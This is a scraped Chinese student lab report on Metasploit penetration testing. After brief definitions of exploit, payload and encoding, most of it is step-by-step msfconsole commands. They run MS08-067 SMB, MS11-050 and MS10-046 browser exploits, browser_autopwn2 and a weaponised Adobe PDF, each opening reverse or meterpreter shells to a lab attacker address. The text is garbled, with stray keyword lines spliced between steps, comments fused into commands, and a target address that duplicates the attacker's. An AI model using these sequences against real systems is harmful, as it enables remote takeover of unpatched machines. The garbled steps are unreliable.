(1)用本身的話解釋什麼是 exploit , payload , encode.html
exploit: 設至關於利用漏洞偷偷打開的管道,將作好的木馬病毒等順利傳輸到靶機。
payload: 簡單來講就是病毒代碼包裝成一個可執行的文件,或者包裝成指定的類型,而後經過管道傳輸進去後開始爲咱們控制靶機服務。
encode: 針對payload進行編碼,就是對它進行包裝打扮,改變payload代碼特徵,可是不改變payload爲咱們所用的特徵,但能對payload進行加工。
shell
在攻擊機kali輸入msfconsole進入控制檯,依次輸入如下指令:windows
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp
//tcp反向回連msf exploit(ms08_067_netapi) > set LHOST 192.168.43.161
//攻擊機ipmsf exploit(ms08_067_netapi) > set LPORT 5213
//攻擊端口msf exploit(ms08_067_netapi) > set RHOST 192.168.43.161
//靶機ip,特定漏洞端口已經固定msf exploit(ms08_067_netapi) > set target 0
//自動選擇目標系統類型,匹配度較高msf exploit(ms08_067_netapi) > exploit
//攻擊此時須要關閉靶機的防火牆,否則會出現ConnectionTimeOut
的失敗;
api
攻擊成功後的結果:
瀏覽器
2.瀏覽器滲透攻擊——MS11-050安全
msf > use windows/browser/ms11_050_mshtml_cobjectelement
msf exploit(ms11_050_cobjectelement) > set payload
windows/meterpreter/reverse_http
//http反向回連msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.43.161
//攻擊機ipmsf exploit(ms11_050_cobjectelement) > set LPORT 5213
//攻擊端口固定msf exploit(ms11_050_cobjectelement) > set URIPATH 5213lzm
//統一資源標識符路徑設置msf exploit(ms11_050_cobjectelement) > exploit
如今攻擊機裏進入msfconsole,而後分別輸入
use auxiliary/server/browser_autopwn2
set SRVHOST 192.168.43.161
set URIPATH auto
show options
服務器
嘗試成功,輸出了可被訪問的URL http://192.168.43.161:8080/auto
並啓動服務器;
session
在靶機瀏覽器上輸入URL後,瀏覽器跳轉到 http://192.168.43.161:8080/auto/FaOGsp
上
tcp
回頭看一下kali機,發現回連成功了,輸入session -i 2
獲取對話,此時,已經得到了靶機的控制權。
測試
3.針對Adobe Reader軟件的滲透攻擊——adobe_toolbutton
msf > use windows/fileformat/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing) > set payload
windows/meterpreter/reverse_tcp
//tcp反向回連msf exploit(adobe_cooltype_sing) > set LHOST 192.168.43.161
//攻擊機ipmsf exploit(adobe_cooltype_sing) > set LPORT 5213
//攻擊端口msf exploit(adobe_cooltype_sing) > set FILENAME 5213lzm.pdf
//設置生成pdf文件的名字msf exploit(adobe_cooltype_sing) > exploit
//攻擊將生成的pdf文件拷貝到靶機上。
在kali上輸入back退出當前模塊,進入監聽模塊,輸入如下命令:
msf > use exploit/multi/handler
//進入監聽模塊msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
//tcp反向鏈接msf exploit(handler) > set LHOST 192.168.43.161
//攻擊機ipmsf exploit(handler) > set LPORT 5213
//攻擊端口固定msf exploit(handler) > exploit
msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.43.48
//攻擊機ipmsf exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/meterpreter/reverse_tcp
//tcp反向回連msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.43.48
//攻擊機ipmsf exploit(ms10_046_shortcut_icon_dllloader) > exploit
//攻擊sessions
查看,並選擇sessions -i 1
,得到靶機控制權。本次試驗給我最深的感觸就是msf的強大,活用msf真的可以在滲透測試或者以攻擊爲目的的行爲給予很大幫助,同時,爲了防止被攻擊,仍是及時更新系統,填補漏洞,由於有一雙研眼鏡正在窺探你的筆記本。